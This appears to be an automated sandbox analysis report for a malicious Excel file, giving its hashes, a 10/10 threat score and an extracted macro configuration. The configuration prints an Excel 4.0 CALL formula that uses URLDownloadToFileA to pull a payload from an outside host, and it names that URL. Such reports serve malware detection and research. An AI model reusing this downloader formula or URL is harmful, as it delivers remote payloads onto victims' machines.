General
-
Target
document-258143161.xls
-
Size
39KB
-
Sample
210304-ngtfbcwr8n
-
MD5
8322af5fe7ecefd0fe1d00cb48460fa5
-
SHA1
053ccfe71374f39fc33bb33dedd083332fbd5243
-
SHA256
e169b78da767abaaadab008e86aa27cd58f9da1755970520114fcf7656608a60
-
SHA512
746a5b02ba114897e759c591730fae3805bfae91b0229528b2c336ee4f6c63a8f9e26c6f2b8a5899f35320c46a2d57a05f578e776ce640e8f64103a70f42ed7a
Malware Config
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
Targets
-
-
Target
document-258143161.xls
-
Size
39KB
-
MD5
8322af5fe7ecefd0fe1d00cb48460fa5
-
SHA1
053ccfe71374f39fc33bb33dedd083332fbd5243
-
SHA256
e169b78da767abaaadab008e86aa27cd58f9da1755970520114fcf7656608a60
-
SHA512
746a5b02ba114897e759c591730fae3805bfae91b0229528b2c336ee4f6c63a8f9e26c6f2b8a5899f35320c46a2d57a05f578e776ce640e8f64103a70f42ed7a
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-